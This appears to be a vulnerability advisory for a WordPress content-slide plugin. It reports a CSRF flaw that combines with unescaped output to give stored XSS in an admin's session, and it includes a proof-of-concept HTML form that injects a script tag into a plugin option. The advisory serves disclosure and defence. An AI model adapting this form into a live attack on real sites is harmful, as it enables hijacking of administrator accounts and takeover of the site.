CVSS Summary
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
Last revised:
An attacker able to convince an admin to visit a link of their choosing is able to execute arbitrary javascript:
A CSRF vulnerability allows an attacker to change any option in the plugin. The plugin does not escape content when put into HTML so the attacker can then use JavaScript to perform almost any action an admin can take (including creating new users, executing arbitrary php through the theme editor or exploiting vulnerabilities in WordPress or other plugins which normally require the user to be authenticated as an admin).
Current state: Reported
Score | 6.8 Medium |
---|---|
Vector | Network |
Complexity | Medium |
Authentication | None |
Confidentiality | Partial |
Integrity | Partial |
Availability | Partial |
While logged into a site with the plugin enabled open a page containing the following form and click the submit button (in a real attack the form could be made to auto-submit):
<form action="http://localhost/wp-admin/admin.php?page=content-slide/content_slide.php" method="POST"> <input type="text" name="wpcs_options[no_of_custom_images]" value="1"> <input type="text" name="wpcs_options[slide_image1]" value=""><script>alert(1)</script>"> <input type="submit"> </form>
If using a browser without reflected XSS mitigation (e.g. Chrome) the admin user will see “1” in an alert box, otherwise a refresh of the page is required before the JavaScript is executed.
Disable the plugin until a new version is released that fixes this bug
At the time of publishing no fix is available and the plugin has been removed from the plugin directory